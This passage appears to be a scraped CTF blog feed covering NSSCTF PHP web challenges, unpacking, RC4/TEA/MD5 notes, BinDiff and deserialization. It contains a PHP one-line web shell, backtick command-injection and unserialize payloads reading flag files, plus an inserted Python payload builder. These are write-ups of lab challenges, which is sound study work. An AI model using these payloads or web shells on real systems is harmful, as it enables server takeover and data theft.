外部文件包含.png <br></code></pre></td></tr></table></figure><p>外部文件包含.png</p><figure 
class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span> <span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-number">0</span>]);<span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>利用蚁剑成功连接<br><img src="https://gitee.com/fogpost/photo/raw/master/202411011528057.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411011529825.png" srcset="/img/loading.gif" lazyload><br>NSSCTF{11822be1-0c76-4bc8-9f67-82fcf3f3ec33}</p><h3 id="未选择的路"><a href="#未选择的路" class="headerlink" title="未选择的路"></a>未选择的路</h3><p>打开环境</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-comment">//一片森林里分出两条路————而我选择了人迹更少的一条,从此决定了我一生的道路。</span><br><span class="hljs-title function_ invoke__">Include</span>(<span class="hljs-string">'check.php'</span>);<br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><br><span class="hljs-variable">$A</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'easy'</span>];<br><span class="hljs-variable">$B</span>=<span 
class="hljs-variable">$_GET</span>[<span class="hljs-string">'hard'</span>];<br><br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$A</span>)){<br><span class="hljs-keyword">eval</span>(<span class="hljs-string">'e'</span>.<span class="hljs-string">'x'</span>.<span class="hljs-string">'i'</span>.<span class="hljs-string">'t'</span>.<span class="hljs-string">'(); ?>'</span>.<span class="hljs-variable">$A</span>.<span class="hljs-string">'<?php ;'</span>);<span class="hljs-comment">//这条路没有任何过滤诶,是不是好走一些</span><br>}<br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$B</span>)){<br><span class="hljs-title function_ invoke__">check</span>(<span class="hljs-variable">$B</span>);<span class="hljs-comment">//要被正则了,嘤嘤嘤</span><br><span class="hljs-keyword">eval</span>(<span class="hljs-string">"#cmd"</span>.<span class="hljs-variable">$B</span>.<span class="hljs-string">"inject"</span>);<span class="hljs-comment">//这条路怎么还要禁我东西啊,真下头</span><br>}<br></code></pre></td></tr></table></figure><p>先用hard走 hard=system,不过会显示passthru和system被禁用了,使用?>反引号加闭合?hard=?><?php echo `id`;?>(这个不是引号,这个是反引号)<br>这个时候id就是可以执行得命令有点感觉是将前面得过滤,重新插了一个新得php进来执行完成绕过<br>尝试一下easy,好像会直接结束,方式就是在hard过滤</p><h3 id="Maxser-Revenge"><a href="#Maxser-Revenge" class="headerlink" title="Maxser Revenge"></a>Maxser Revenge</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span 
class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br> <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br> <span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br> <span class="hljs-keyword">include</span>(<span class="hljs-string">'check.php'</span>);<br> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">passthru</span></span>{<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$S</span>;<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$dir</span>;<br> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-variable language_">$this</span>->dir=<span class="hljs-string">'notion'</span>;<br> }<br> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>->S);<br> }<br> }<br> <span class="hljs-variable">$a</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'NSS'</span>];<br> <span class="hljs-title function_ invoke__">check</span>(<span class="hljs-variable">$a</span>);<br> <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$a</span>);<br></code></pre></td></tr></table></figure><p>一道反序列化题目,我们尝试简单构建pop链,发现存在过滤</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs 
php"><span class="hljs-variable">$a</span>=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">passthru</span>();<br><span class="hljs-variable">$a</span>->S=<span class="hljs-string">"system('ls /')"</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);<br> O:<span class="hljs-number">8</span>:<span class="hljs-string">"passthru"</span>:<span class="hljs-number">2</span>:{s:<span class="hljs-number">1</span>:<span class="hljs-string">"S"</span>;s:<span class="hljs-number">14</span>:<span class="hljs-string">"system('ls /')"</span>;s:<span class="hljs-number">3</span>:<span class="hljs-string">"dir"</span>;N;}<br></code></pre></td></tr></table></figure><p><img src="https://gitee.com/fogpost/photo/raw/master/202411041446655.png" srcset="/img/loading.gif" lazyload><br>利用passthru过滤,转换成16进制来过滤</p><blockquote><p>passthru(“cat /f*”)这个转化成16进制不会产生字母<br>70 61 73 73 74 68 72 75 28 22 63 61 74 20 2F 66 2A 22 29<br>2f和2a换成/和<em>这两个直接用<br>O:8:”passthru”:2:{s:1:”S”;S:20:”\70\61\73\73\74\68\72\75\28\22\63\61\74\20/\66</em>\22\29;”;s:3:”dir”;N;}直接修改,并用大写S来支持字符串得编码</p></blockquote><h3 id="The-future-Revenge"><a href="#The-future-Revenge" class="headerlink" title="The future Revenge"></a>The future Revenge</h3><p>考点CVE-2024-2961<br><a href="https://blog.csdn.net/jennycisp/article/details/140148391">https://blog.csdn.net/jennycisp/article/details/140148391</a><br><a href="https://err0r233.github.io/posts/28510.html">https://err0r233.github.io/posts/28510.html</a> (要梯子)</p><h3 id="签到"><a href="#签到" class="headerlink" title="签到"></a>签到</h3><p>点击后就是这个界面<br><img src="https://gitee.com/fogpost/photo/raw/master/202411071924871.png" srcset="/img/loading.gif" lazyload><br>我们点击sign,最后一个博客地址判断存在ssrf<br><img src="https://gitee.com/fogpost/photo/raw/master/202411071925412.png" srcset="/img/loading.gif" 
lazyload><br>我们查看源码,index.php、submit.php、save_user.php、show_blog.php,存在这么几个文件<br><img src="https://gitee.com/fogpost/photo/raw/master/202411071927695.png" srcset="/img/loading.gif" lazyload><br>这个好像涉及ssrf了,本人不是很懂,现在先暂停一下,之后补上来</p>]]></content>
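<![CDATA[
Added example, not the write-up's own script: the same TEA decryption in Python, with the byte order handled explicitly so the flag comes out as text instead of needing a separate hex-to-characters step. The delta (0x114514), the round count (33), the key and the ciphertext bytes are the values the write-up read from the binary; the observation that the ciphertext is stored as little-endian dwords while the plaintext dwords spell the flag big-endian is taken from the printed output above. It also includes the matching encryption so the round trip can be checked.

```python
import struct

# Added example, not the write-up's script.  Constants as read from the binary.
MASK = 0xFFFFFFFF
DELTA = 0x114514          # 1131796, instead of the standard 0x9E3779B9
ROUNDS = 33               # instead of the standard 32
KEY = (0x0B, 0x16, 0x21, 0x2C)
ENC = bytes([0x65, 0xD2, 0x26, 0x3A, 0xB6, 0xA0, 0xD9, 0x81, 0x2A, 0x00, 0x5E, 0x0E,
             0xE5, 0xEF, 0x07, 0x39, 0x57, 0xBC, 0xB6, 0x71, 0xA2, 0x0D, 0xAC, 0xE0])


def tea_encrypt_block(v0, v1, k, delta=DELTA, rounds=ROUNDS):
    """Forward TEA on one 64-bit block (two 32-bit words)."""
    s = 0
    for _ in range(rounds):
        s = (s + delta) & MASK
        v0 = (v0 + ((((v1 << 4) & MASK) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK
        v1 = (v1 + ((((v0 << 4) & MASK) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK
    return v0, v1


def tea_decrypt_block(v0, v1, k, delta=DELTA, rounds=ROUNDS):
    """Inverse of tea_encrypt_block: sum starts at delta * rounds and counts down."""
    s = (delta * rounds) & MASK
    for _ in range(rounds):
        v1 = (v1 - ((((v0 << 4) & MASK) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK
        v0 = (v0 - ((((v1 << 4) & MASK) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK
        s = (s - delta) & MASK
    return v0, v1


def decrypt_flag(enc: bytes, key=KEY) -> bytes:
    """Ciphertext dwords are little-endian in the binary; the plaintext dwords
    hold the flag bytes most-significant first, so unpack '<' and repack '>'."""
    out = b""
    for off in range(0, len(enc), 8):
        v0, v1 = struct.unpack("<2I", enc[off:off + 8])
        p0, p1 = tea_decrypt_block(v0, v1, key)
        out += struct.pack(">2I", p0, p1)
    return out


def encrypt_flag(flag: bytes, key=KEY) -> bytes:
    """The reverse mapping, useful to confirm the byte-order assumption."""
    out = b""
    for off in range(0, len(flag), 8):
        p0, p1 = struct.unpack(">2I", flag[off:off + 8])
        c0, c1 = tea_encrypt_block(p0, p1, key)
        out += struct.pack("<2I", c0, c1)
    return out


if __name__ == "__main__":
    print(decrypt_flag(ENC))
```

Getting the `<` / `>` pair wrong is the usual reason a TEA solver prints garbage even though the algorithm is right; if the words come out mirrored (e.g. `CSSN`), swap the pack format rather than the rounds.
]]>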
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>Using and writing OllyDbg unpacking scripts</title>
<link href="/2024/10/29/od%E8%84%B1%E5%A3%B3%E8%84%9A%E6%9C%AC%E7%9A%84%E4%BD%BF%E7%94%A8%E4%B8%8E%E7%BC%96%E5%86%99/"/>
<url>/2024/10/29/od%E8%84%B1%E5%A3%B3%E8%84%9A%E6%9C%AC%E7%9A%84%E4%BD%BF%E7%94%A8%E4%B8%8E%E7%BC%96%E5%86%99/</url>
<content type="html"><![CDATA[<h1 id="od脱壳脚本的使用与编写"><a href="#od脱壳脚本的使用与编写" class="headerlink" title="Using and writing OllyDbg unpacking scripts"></a>Using and writing OllyDbg unpacking scripts</h1><p>The target program comes from <a href="https://www.52pojie.cn/thread-422100-1-1.html">52pojie</a><br>Step one: check the packer and drop the file into IDA Pro to see what is there<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292248198.png" srcset="/img/loading.gif" lazyload><br>The program was packed with tElock<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292249831.png" srcset="/img/loading.gif" lazyload><br>As expected, IDA finds nothing useful. Load it in OllyDbg and look at the memory map: the image base is 400000, which tells us ASLR is not in effect for this binary, and that matters for the unpacking later<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292251590.png" srcset="/img/loading.gif" lazyload><br>Single-stepping to this point, the program runs away<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292253699.png" srcset="/img/loading.gif" lazyload><br>After setting a breakpoint and entering input, stepping over shows the dialog below, which means the program checksums its own code; a software breakpoint writes an 0xCC byte into the code, so the check trips. Two options: find the self-check and NOP it out, or clear the breakpoints before each input, which is a good habit anyway<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292254330.png" srcset="/img/loading.gif" lazyload><br>The next picture shows that the program also detects the debugger. The OllyDbg kernel-mode anti-detection plugin is enabled here, but it apparently does not work on Windows 10 and fails to hide the debugger; loading under Windows 7 is an option<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292303768.png" srcset="/img/loading.gif" lazyload><br>Reloading the file, the jump for the OllyDbg check is found here; NOP it and the program starts normally<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292321969.png" srcset="/img/loading.gif" lazyload><br>Had it not been NOPed, the next picture is where it would jump to ExitProcess and the process would end<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292321971.png" srcset="/img/loading.gif" lazyload></p>]]></content>
<categories>
<category>Reverse engineering</category>
</categories>
<tags>
<tag>reverse</tag>
</tags>
</entry>
<entry>
<title>rc4</title>
<link href="/2024/10/28/rc4/"/>
<url>/2024/10/28/rc4/</url>
<content type="html"><![CDATA[<h1 id="RC4"><a href="#RC4" class="headerlink" title="RC4"></a>RC4</h1><p>Simple symmetric ciphers like RC4 turn up while solving challenges, so here is the matching decryption script.<br>The initial S-box and the keystream derived from it are fully determined by the fixed key, and encryption is nothing more than XOR with that keystream, so one function both encrypts and decrypts.<br>RC4 has three parts</p><ul><li>initialise the S-box (KSA)</li><li>generate the keystream (PRGA)</li><li>encrypt, i.e. XOR the data with the keystream</li></ul><pre><code class="python">def KSA(key):
    """Key scheduling: key is a bytes object (or a list of ints)."""
    key_length = len(key)

    # initialise the S-box
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % key_length]) % 256
        S[i], S[j] = S[j], S[i]

    return S

def PRGA(S):
    """Keystream generator; yields one byte per call to next()."""
    i = 0
    j = 0
    while True:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) % 256]
        yield K

def RC4(key, data):
    """XOR data with the keystream; calling it again on the output decrypts."""
    S = KSA(key)
    keystream = PRGA(S)
    res = []
    for c in data:
        res.append(c ^ next(keystream))
    return bytes(res)
</code></pre>]]></content>
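<![CDATA[
Added example, not the post's own script: RC4 checked against a published known-answer vector (key "Key", plaintext "Plaintext"), plus a demonstration of the consequence of the property the post relies on. Because encryption is XOR with a keystream that depends only on the key, two messages encrypted under the same key leak each other: c1 ^ c2 equals p1 ^ p2, and knowing or guessing one plaintext recovers the other without the key. The two sample messages are constructed for the demonstration.

```python
# Added example (not the post's code): RC4 with a known-answer test and a
# keystream-reuse demonstration on constructed sample messages.

def ksa(key: bytes) -> list:
    """Key-scheduling algorithm: build the initial S-box from the key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def prga(s: list):
    """Pseudo-random generation algorithm: yield keystream bytes forever."""
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (same operation) data under key."""
    ks = prga(ksa(key))
    return bytes(b ^ next(ks) for b in data)


def check_test_vector() -> bool:
    """Known-answer test from the RC4 literature: key 'Key', plaintext 'Plaintext'."""
    return rc4(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"


def keystream_reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """XOR of two ciphertexts under the same key is the XOR of the plaintexts."""
    return bytes(a ^ b for a, b in zip(c1, c2))


def recover_with_crib(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """If one plaintext is known (or guessed), the other drops out without the key."""
    return bytes(a ^ b ^ k for a, b, k in zip(c1, c2, known_p1))


if __name__ == "__main__":
    key = b"Secret"                       # constructed sample key
    c1 = rc4(key, b"Attack at dawn")      # constructed sample messages
    c2 = rc4(key, b"Retreat at 9am")
    print("test vector ok:", check_test_vector())
    print("recovered p2:", recover_with_crib(c1, c2, b"Attack at dawn"))
```

The keystream-reuse functions are why a CTF binary that RC4-encrypts several strings with one hard-coded key can often be solved without reversing the key at all: one known plaintext (a format string, a flag prefix) unlocks the rest.
]]>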
<categories>
<category>Reverse engineering algorithms</category>
</categories>
<tags>
<tag>reverse</tag>
</tags>
</entry>
<entry>
<title>hash</title>
<link href="/2024/10/28/hash/"/>
<url>/2024/10/28/hash/</url>
<content type="html"><![CDATA[<h1 id="hash算法"><a href="#hash算法" class="headerlink" title="Hash algorithms"></a>Hash algorithms</h1><p>I want to understand the details of the common hash algorithms so that I recognise them when they show up as pseudocode.</p><h2 id="MD5"><a href="#MD5" class="headerlink" title="MD5"></a>MD5</h2><h3 id="MD5加密原理步骤"><a href="#MD5加密原理步骤" class="headerlink" title="MD5 algorithm steps"></a>MD5 algorithm steps</h3><ol><li>Padding: append a single 1 bit followed by 0 bits until the bit length is congruent to 448 modulo 512 (padding is always applied, even if the length already satisfies this, so a whole extra block may be added), then append the original length in bits as a 64-bit little-endian integer, giving N*512 bits in total.</li><li>Initialise the four state words. As byte sequences in memory they are A=01 23 45 67, B=89 AB CD EF, C=FE DC BA 98, D=76 54 32 10; read as little-endian 32-bit words, which is how they appear in code, they are A=0x67452301, B=0xEFCDAB89, C=0x98BADCFE, D=0x10325476.</li><li>Process each 512-bit block<br>These are the four non-linear functions, one per round of 16 steps:<br>F(X, Y, Z) = (X & Y) | ((~X) & Z)<br>G(X, Y, Z) = (X & Z) | (Y & (~Z))<br>H(X, Y, Z) = X ^ Y ^ Z<br>I(X, Y, Z) = Y ^ (X | (~Z))</li></ol><ul><li>MD5 is an iterated compression function: each block goes through 64 steps of bitwise operations, additions of per-step constants and left rotations.</li><li>Constants: the initial values 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, and the per-step constants floor(2^32 * |sin(i)|) (the first two are 0xD76AA478 and 0xE8C7B756) showing up in additions, point to MD5 or a variant of it. If the initial values are present but altered, it is a modified MD5, so always verify a suspected implementation against a known hash before trusting a library to reproduce it.</li><li>Input handling: data is processed in 512-bit (64-byte) blocks, each split into sixteen 32-bit (4-byte) little-endian words.</li></ul>]]></content>
<categories>
<category>Reverse engineering algorithms</category>
</categories>
<tags>
<tag>reverse</tag>
</tags>
</entry>
<entry>
<title>bindiff</title>
<link href="/2024/10/28/bindiff/"/>
<url>/2024/10/28/bindiff/</url>
<content type="html"><![CDATA[<h1 id="用bindiff来显示二进制文件的区别"><a href="#用bindiff来显示二进制文件的区别" class="headerlink" title="Using BinDiff to show the differences between two binaries"></a>Using BinDiff to show the differences between two binaries</h1><p>Faced with a tampered binary and no way to compare it, staring at two files without knowing where to start, drowning in a sea of functions and unable to find what changed after the patch? BinDiff can help.</p><h3 id="1-自行安装"><a href="#1-自行安装" class="headerlink" title="1. Install it yourself"></a>1. Install it yourself</h3><h3 id="2-使用"><a href="#2-使用" class="headerlink" title="2. Usage"></a>2. Usage</h3><p>First open the program to analyse; once IDA has finished its analysis, exit and keep the .i64 database. Then load the patched file and press Ctrl+6 in IDA to invoke the BinDiff plugin<br><img src="https://gitee.com/fogpost/photo/raw/master/202410281503232.png" srcset="/img/loading.gif" lazyload><br>Choose Diff Database and select the saved .i64 file; the comparison window appears<br><img src="https://gitee.com/fogpost/photo/raw/master/202410281504805.png" srcset="/img/loading.gif" lazyload><br>In the green panel the function at the bottom, extract_dirs_from_files, has a similarity of only 0.84 against the original, so this is where the two binaries differ<br><img src="https://gitee.com/fogpost/photo/raw/master/202410281506283.png" srcset="/img/loading.gif" lazyload><br>Looking at the function, the patched version has the extra branch below</p><pre><code class="c++">LABEL_7:
      if ( v9 && !v9[1] )
      {
        *(_QWORD *)&lmao[8] = 0x3F7D132A2A252822LL;
        *(_QWORD *)lmao = 0x7D2E370A180F1604LL;
        *(_QWORD *)&lmao[24] = 0x31207C7C381320LL;
        *(_QWORD *)&lmao[16] = 0x392A7F3F39132D13LL;
        v18 = lmao;
        do
          *v18++ ^= **(_BYTE **)v7;
        while ( &lmao[31] != v18 );
        puts(lmao);
      }
      goto LABEL_9;
    }
    if ( !dirname )
      goto LABEL_21;
    component = last_component(*(const char **)v7);
    if ( *component == 46 )
    {
      v17 = component[(component[1] == 46) + 1];
      if ( !v17 || v17 == 47 )
        goto LABEL_7;
    }
    if ( *v9 == 47 )
    {
</code></pre><p>The branch XORs a 31-byte buffer with the first byte of the file-name argument and prints it, so a single-byte XOR brute force in CyberChef recovers the final string. Note that the constants are stored as little-endian qwords, so the byte order in the buffer is the reverse of how they read in the decompiler output<br>  <img src="https://gitee.com/fogpost/photo/raw/master/202410281511684.png" srcset="/img/loading.gif" lazyload><br><a href="https://www.nssctf.cn/problem/3687">Problem source</a></p>]]></content>
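<![CDATA[
Added example, not the post's own code: the CyberChef step done in Python. The four 64-bit constants are copied from the decompiled branch above and laid out in memory the way an x86-64 store does it (low byte first), which is the endianness point the post warns about; the loop stops at lmao[31], so 31 bytes take part. The XOR key byte is `**(_BYTE **)v7`, the first character of whatever path the program was started with, which the brute force recovers rather than assumes. The filter keeps only keys whose output is printable and shaped like a flag, which is what makes the answer unique here.

```python
import re
import struct

# Added example (not the post's code): rebuild the buffer from the decompiled
# constants and brute-force the single XOR key byte.
QWORDS = {          # offset into lmao -> constant, as in the decompiler output
    0: 0x7D2E370A180F1604,
    8: 0x3F7D132A2A252822,
    16: 0x392A7F3F39132D13,
    24: 0x31207C7C381320,
}


def rebuild_buffer() -> bytes:
    """Lay the qwords out as the binary does: little-endian, low byte first."""
    buf = bytearray(32)
    for off, q in QWORDS.items():
        buf[off:off + 8] = struct.pack("<Q", q)
    return bytes(buf[:31])      # the do/while stops when v18 reaches &lmao[31]


def xor_bruteforce(buf: bytes, pattern: str = r"^[A-Za-z0-9_]+\{[^{}]+\}$") -> list:
    """Try all 256 single-byte keys; keep printable outputs matching `pattern`.

    Returns a list of (key, text).  With the default flag-shaped pattern the
    closing brace pins the key: only one key maps the last byte to '}'.
    """
    rx = re.compile(pattern)
    hits = []
    for k in range(256):
        out = bytes(b ^ k for b in buf)
        if all(0x20 <= b < 0x7F for b in out) and rx.match(out.decode("ascii")):
            hits.append((k, out.decode("ascii")))
    return hits


if __name__ == "__main__":
    for key, text in xor_bruteforce(rebuild_buffer()):
        print(hex(key), repr(chr(key)), text)
```

Without the pattern, every key in 0x20..0x5F gives printable output, which is the same wall of candidates CyberChef shows; a crib on the expected shape of the string is what narrows it down.
]]>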
<categories>
<category>Reverse engineering</category>
</categories>
<tags>
<tag>tool</tag>
</tags>
</entry>
<entry>
<title>Changing Linux apt mirrors</title>
<link href="/2024/10/28/linux/"/>
<url>/2024/10/28/linux/</url>
<content type="html"><![CDATA[<p>Mirror settings, kept here so I do not have to search for them again</p><blockquote><p>sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup</p></blockquote><blockquote><p>sudo gedit /etc/apt/sources.list</p></blockquote><p>Lines for sources.list (USTC mirror for Kali; shown commented out, remove the leading # to enable them and run sudo apt update afterwards)</p><p>#deb <a href="http://mirrors.ustc.edu.cn/kali">http://mirrors.ustc.edu.cn/kali</a> kali-rolling main non-free contrib<br>#deb-src <a href="http://mirrors.ustc.edu.cn/kali">http://mirrors.ustc.edu.cn/kali</a> kali-rolling main non-free contrib</p>]]></content>
<categories>
<category>tool</category>
</categories>
<tags>
<tag>linux</tag>
</tags>
</entry>
<entry>
<title>Deserialization example problems</title>
<link href="/2024/10/27/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"/>
<url>/2024/10/27/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/</url>
<content type="html"><![CDATA[<p>To begin with, learn by working through problems</p><h3 id="例题1-SWPUCTF-2021-新生赛-no-wakeup"><a href="#例题1-SWPUCTF-2021-新生赛-no-wakeup" class="headerlink" title="Example 1 [SWPUCTF 2021 新生赛]no_wakeup"></a>Example 1 [SWPUCTF 2021 新生赛]no_wakeup</h3><p>Straight to the source</p><pre><code class="php"><?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");
class HaHaHa{
    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

    public function __wakeup(){
        $this->passwd = sha1($this->passwd);
    }

    public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "wllm"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->passwd;
            echo "No wake up";
        }
    }
}
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);
?>
</code></pre><p>From the write-up: when unserialize() runs, __wakeup() is invoked automatically and replaces passwd with its sha1, which cannot be reversed, so __wakeup() has to be bypassed.</p><ul><li>Knowledge point, a PHP quirk: when the property count in the serialized string is larger than the object's real number of properties, __wakeup() is skipped. This is CVE-2016-7124 and only works on PHP before 5.6.25 and 7.0.10; later versions reject the mismatched object instead.</li></ul><pre><code class="php">$aa = new HaHaHa();
$aa->admin = "admin";
$aa->passwd = "wllm";
$stus = serialize($aa);
print_r($stus);
</code></pre><p>O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}<br>After serializing, bump the property count and send the result as p<br>O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}</p>]]></content>
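<![CDATA[
Added example, in Python rather than PHP and not the post's own code: a small serializer for PHP objects whose properties are strings or null, covering the two payload tricks used on this site. The first is the one above, overstating the property count so that an old PHP skips __wakeup() (CVE-2016-7124); the second is the one from the NSSCTF "Maxser Revenge" write-up, writing the string in PHP's uppercase-S form with \xx escapes, escaping exactly those bytes whose two hex digits are decimal and leaving the rest (/ , * and ;) literal, which keeps the function name out of the payload as a literal word. Class and property names are the challenges' own; the filter in check.php is not known, so nothing here claims to model it.

```python
import re

# Added example (not the post's code): PHP serialized-object payload builder
# for the __wakeup count trick and the S:"\xx" escape trick.


def hex_escape(s: str, digits: str = "0123456789") -> str:
    """Write a character as \\xx only when both hex digits are in `digits`;
    otherwise keep it literal.  With the default this reproduces the
    Maxser Revenge payload: 2f, 2a and 3b stay as '/', '*' and ';'."""
    out = []
    for c in s:
        h = "%02x" % ord(c)
        out.append("\\" + h if all(d in digits for d in h) else c)
    return "".join(out)


def php_unescape(body: str) -> str:
    """Decode the \\xx escapes PHP accepts inside an S:"..." string."""
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), body)


def php_str(s: str, escaped: bool = False) -> str:
    """s:len:"..." (plain) or S:len:"..." (escaped); len is the decoded length."""
    if not escaped:
        return f's:{len(s)}:"{s}"'
    return f'S:{len(s)}:"{hex_escape(s)}"'


def php_object(cls: str, props: dict, extra_count: int = 0, escape=()) -> str:
    """Serialize an object; property values may be str or None.
    extra_count > 0 overstates the property count (the __wakeup bypass)."""
    parts = []
    for name, val in props.items():
        parts.append(php_str(name))
        parts.append("N" if val is None else php_str(val, name in escape))
    body = ";".join(parts) + ";"
    return f'O:{len(cls)}:"{cls}":{len(props) + extra_count}:{{{body}}}'


def no_wakeup_payload() -> str:
    """This post's HaHaHa object with the property count bumped from 2 to 3."""
    return php_object("HaHaHa", {"admin": "admin", "passwd": "wllm"}, extra_count=1)


def maxser_payload(cmd: str = 'passthru("cat /f*");') -> str:
    """The Maxser Revenge object with S hex-escaped; dir is left null."""
    return php_object("passthru", {"S": cmd, "dir": None}, escape=("S",))


if __name__ == "__main__":
    print(no_wakeup_payload())
    print(maxser_payload())
```

PHP counts the length field against the decoded string, so a hand-edited payload that escapes a few characters and forgets to keep the original length is the usual reason unserialize() silently returns false.
]]>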
<categories>
<category>Network</category>
</categories>
<tags>
<tag>php</tag>
</tags>
</entry>
<entry>
<title>solidity</title>
<link href="/2024/10/25/solidity/"/>
<url>/2024/10/25/solidity/</url>
<content type="html"><![CDATA[<h1 id="Solidity代码块"><a href="#Solidity代码块" class="headerlink" title="Solidity代码块"></a>Solidity code blocks</h1><p>I really did not want to write this up. It is code I had never seen; when the time comes I will just search for it and memorise it. All the code below is Solidity; for readability it is highlighted as C++, because sd has no built-in Solidity highlighter and I could not be bothered to look for one.</p><h2 id="完成加减运算"><a href="#完成加减运算" class="headerlink" title="完成加减运算"></a>Addition and subtraction</h2><p>int / uint: signed and unsigned integers of various widths. The keywords uint8 to uint256 (unsigned, 8 to 256 bits) and int8 to int256 are supported, in steps of 8 bits. uint and int are aliases for uint256 and int256 respectively.</p><figure class="highlight c++"><table><tr><td class="code"><pre><code class="hljs c++">pragma solidity >=<span class="hljs-number">0.4</span><span class="hljs-number">.21</span> <=<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract MatchTest{<br>    function <span class="hljs-built_in">add</span>(uint i,uint j) pure <span class="hljs-keyword">public</span> <span class="hljs-built_in">returns</span>(uint){<br>        <span class="hljs-keyword">return</span> i + j;<br>    }<br>    <span class="hljs-function">function <span class="hljs-title">sub</span><span class="hljs-params">(uint i,uint j)</span> pure <span class="hljs-keyword">public</span> <span class="hljs-title">returns</span><span class="hljs-params">(uint)</span></span>{<br>        <span class="hljs-keyword">return</span> i - j;<br>    }<br>}<br></code></pre></td></tr></table></figure><p>See, the highlighter cannot even recognise it.</p><p>One thing to watch with that version range: under the 0.4 to 0.7 compilers it admits, integer arithmetic is unchecked, so sub(1, 2) silently wraps to 2**256 - 1 instead of failing; only from 0.8.0 does the subtraction revert on underflow. Pin ^0.8.0, or guard the subtraction with require(i >= j), whenever the numbers are balances.</p><h2 id="简单计算器合约"><a href="#简单计算器合约" 